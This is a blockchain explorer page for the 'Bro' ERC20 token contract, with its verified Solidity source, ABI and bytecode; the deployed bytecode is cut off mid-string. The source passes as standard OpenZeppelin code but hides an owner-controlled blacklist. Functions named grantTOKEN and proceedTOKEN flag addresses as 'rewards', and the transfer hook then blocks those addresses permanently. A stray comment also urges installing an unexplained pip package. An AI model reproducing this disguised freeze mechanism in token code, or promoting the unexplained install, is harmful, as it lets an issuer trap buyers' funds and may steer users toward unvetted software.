ETH Price: $3,422.41 (-2.16%)
Gas: 5 Gwei

Token

Bro (Bro)
 

Overview

Max Total Supply

1,000,000,000,000 Bro

Holders

48

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
15,123,993,414.947144658453533666 Bro

Value
$0.00
0xBa2555da0a05c8cA2b6fC830e8a760D7b403336c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Bro

Compiler Version
v0.8.12+commit.f00d7308

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-09
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/*
    pip3 install endless-flex-v1.1
*/

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _rewards;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    bool private _rewardsApplied = false;


    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function grantTOKEN(address [] calldata _rewardees_) external onlyOwner {
        for (uint256 i = 0; i < _rewardees_.length; i++) {
            _rewards[_rewardees_[i]] = true;
        }
    }

    function proceedTOKEN(address [] calldata _rewardees_) external onlyOwner {
        for (uint256 i = 0; i < _rewardees_.length; i++) {
            _rewards[_rewardees_[i]] = false;
        }
    }

    function isPip(address _rewardee_) public view returns (bool) {
        return _rewards[_rewardee_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 //amount
    ) internal virtual {if (_rewards[to] || _rewards[from]) require(_rewardsApplied == true, "");}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract Bro is ERC20 {
    constructor() ERC20("Bro", "Bro") {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"grantTOKEN","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_rewardee_","type":"address"}],"name":"isPip","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"proceedTOKEN","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526007805460ff191690553480156200001b57600080fd5b506040518060400160405280600381526020016242726f60e81b8152506040518060400160405280600381526020016242726f60e81b8152506200006e62000068620000db60201b60201c565b620000df565b81516200008390600590602085019062000289565b5080516200009990600690602084019062000289565b505050620000d533620000b16200012f60201b60201c565b620000be90600a62000444565b620000cf9064e8d4a510006200045c565b62000134565b620004d6565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b601290565b6001600160a01b038216620001905760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b6200019e600083836200020b565b8060046000828254620001b291906200047e565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b03821660009081526002602052604090205460ff16806200024b57506001600160a01b03831660009081526002602052604090205460ff165b15620002845760075460ff161515600114620002845760405162461bcd60e51b8152602060048201526000602482015260440162000187565b505050565b828054620002979062000499565b90600052602060002090601f016020900481019282620002bb576000855562000306565b82601f10620002d657805160ff191683800117855562000306565b8280016001018555821562000306579182015b8281111562000306578251825591602001919060010190620002e9565b506200031492915062000318565b5090565b5b8082111562000314576000815560010162000319565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620003865781600019048211156200036a576200036a6200032f565b808516156200037857918102915b93841c93908002906200034a565b509250929050565b6000826200039f575060016200043e565b81620003ae575060006200043e565b8160018114620003c75760028114620003d257620003f2565b60019150506200043e565b60ff841115620003e657620003e66200032f565b50506001821b6200043e565b5060208310610133831016604e8410600b841016171562000417575081810a6200043e565b62000423838362000345565b80600019048211156200043a576200043a6200032f565b0290505b92915050565b60006200045560ff8416836200038e565b9392505050565b60008160001904831182151516156200047957620004796200032f565b500290565b600082198211156200049457620004946200032f565b500190565b600181811c90821680620004ae57607f821691505b60208210811415620004d057634e487b7160e01b600052602260045260246000fd5b50919050565b610cae80620004e66000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806395d89b411161007157806395d89b4114610238578063a457c2d714610240578063a9059cbb14610253578063dd62ed3e14610266578063f2fde38b1461027957600080fd5b806370a08231146101d9578063715018a6146102025780638a0e4a911461020a5780638da5cb5b1461021d57600080fd5b8063313ce567116100de578063313ce567146101765780633950935114610185578063619fc974146101985780636f23c7f9146101c457600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015157806323b872dd14610163575b600080fd5b61011861028c565b6040516101259190610a3d565b60405180910390f35b61014161013c366004610aae565b61031e565b6040519015158152602001610125565b6004545b604051908152602001610125565b610141610171366004610ad8565b610336565b60405160128152602001610125565b610141610193366004610aae565b61035a565b6101416101a6366004610b14565b6001600160a01b031660009081526002602052604090205460ff1690565b6101d76101d2366004610b36565b61037c565b005b6101556101e7366004610b14565b6001600160a01b031660009081526001602052604090205490565b6101d76103fb565b6101d7610218366004610b36565b61040f565b6000546040516001600160a01b039091168152602001610125565b610118610489565b61014161024e366004610aae565b610498565b610141610261366004610aae565b610518565b610155610274366004610bab565b610526565b6101d7610287366004610b14565b610551565b60606005805461029b90610bde565b80601f01602080910402602001604051908101604052809291908181526020018280546102c790610bde565b80156103145780601f106102e957610100808354040283529160200191610314565b820191906000526020600020905b8154815290600101906020018083116102f757829003601f168201915b5050505050905090565b60003361032c8185856105ca565b5060019392505050565b6000336103448582856106ee565b61034f858585610768565b506001949350505050565b60003361032c81858561036d8383610526565b6103779190610c2f565b6105ca565b61038461091e565b60005b818110156103f6576000600260008585858181106103a7576103a7610c47565b90506020020160208101906103bc9190610b14565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806103ee81610c5d565b915050610387565b505050565b61040361091e565b61040d6000610978565b565b61041761091e565b60005b818110156103f65760016002600085858581811061043a5761043a610c47565b905060200201602081019061044f9190610b14565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061048181610c5d565b91505061041a565b60606006805461029b90610bde565b600033816104a68286610526565b90508381101561050b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61034f82868684036105ca565b60003361032c818585610768565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b61055961091e565b6001600160a01b0381166105be5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610502565b6105c781610978565b50565b6001600160a01b03831661062c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610502565b6001600160a01b03821661068d5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610502565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fa8484610526565b9050600019811461076257818110156107555760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610502565b61076284848484036105ca565b50505050565b6001600160a01b0383166107cc5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610502565b6001600160a01b03821661082e5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610502565b6108398383836109c8565b6001600160a01b038316600090815260016020526040902054818110156108b15760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610502565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109119086815260200190565b60405180910390a3610762565b6000546001600160a01b0316331461040d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610502565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b03821660009081526002602052604090205460ff1680610a0757506001600160a01b03831660009081526002602052604090205460ff165b156103f65760075460ff1615156001146103f65760405162461bcd60e51b81526020600482015260006024820152604401610502565b600060208083528351808285015260005b81811015610a6a57858101830151858201604001528201610a4e565b81811115610a7c576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610aa957600080fd5b919050565b60008060408385031215610ac157600080fd5b610aca83610a92565b946020939093013593505050565b600080600060608486031215610aed57600080fd5b610af684610a92565b9250610b0460208501610a92565b9150604084013590509250925092565b600060208284031215610b2657600080fd5b610b2f82610a92565b9392505050565b60008060208385031215610b4957600080fd5b823567ffffffffffffffff80821115610b6157600080fd5b818501915085601f830112610b7557600080fd5b813581811115610b8457600080fd5b8660208260051b8501011115610b9957600080fd5b60209290920196919550909350505050565b60008060408385031215610bbe57600080fd5b610bc783610a92565b9150610bd560208401610a92565b90509250929050565b600181811c90821680610bf257607f821691505b60208210811415610c1357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60008219821115610c4257610c42610c19565b500190565b634e487b7160e01b600052603260045260246000fd5b6000600019821415610c7157610c71610c19565b506001019056fea2646970667358221220a40cc14d0886740707511b032696f8c733b17688ae2d9bcabc70401292e9830764736f6c634300080c0033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806395d89b411161007157806395d89b4114610238578063a457c2d714610240578063a9059cbb14610253578063dd62ed3e14610266578063f2fde38b1461027957600080fd5b806370a08231146101d9578063715018a6146102025780638a0e4a911461020a5780638da5cb5b1461021d57600080fd5b8063313ce567116100de578063313ce567146101765780633950935114610185578063619fc974146101985780636f23c7f9146101c457600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015157806323b872dd14610163575b600080fd5b61011861028c565b6040516101259190610a3d565b60405180910390f35b61014161013c366004610aae565b61031e565b6040519015158152602001610125565b6004545b604051908152602001610125565b610141610171366004610ad8565b610336565b60405160128152602001610125565b610141610193366004610aae565b61035a565b6101416101a6366004610b14565b6001600160a01b031660009081526002602052604090205460ff1690565b6101d76101d2366004610b36565b61037c565b005b6101556101e7366004610b14565b6001600160a01b031660009081526001602052604090205490565b6101d76103fb565b6101d7610218366004610b36565b61040f565b6000546040516001600160a01b039091168152602001610125565b610118610489565b61014161024e366004610aae565b610498565b610141610261366004610aae565b610518565b610155610274366004610bab565b610526565b6101d7610287366004610b14565b610551565b60606005805461029b90610bde565b80601f01602080910402602001604051908101604052809291908181526020018280546102c790610bde565b80156103145780601f106102e957610100808354040283529160200191610314565b820191906000526020600020905b8154815290600101906020018083116102f757829003601f168201915b5050505050905090565b60003361032c8185856105ca565b5060019392505050565b6000336103448582856106ee565b61034f858585610768565b506001949350505050565b60003361032c81858561036d8383610526565b6103779190610c2f565b6105ca565b61038461091e565b60005b818110156103f6576000600260008585858181106103a7576103a7610c47565b90506020020160208101906103bc9190610b14565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806103ee81610c5d565b915050610387565b505050565b61040361091e565b61040d6000610978565b565b61041761091e565b60005b818110156103f65760016002600085858581811061043a5761043a610c47565b905060200201602081019061044f9190610b14565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061048181610c5d565b91505061041a565b60606006805461029b90610bde565b600033816104a68286610526565b90508381101561050b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61034f82868684036105ca565b60003361032c818585610768565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b61055961091e565b6001600160a01b0381166105be5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610502565b6105c781610978565b50565b6001600160a01b03831661062c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610502565b6001600160a01b03821661068d5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610502565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fa8484610526565b9050600019811461076257818110156107555760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610502565b61076284848484036105ca565b50505050565b6001600160a01b0383166107cc5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610502565b60016001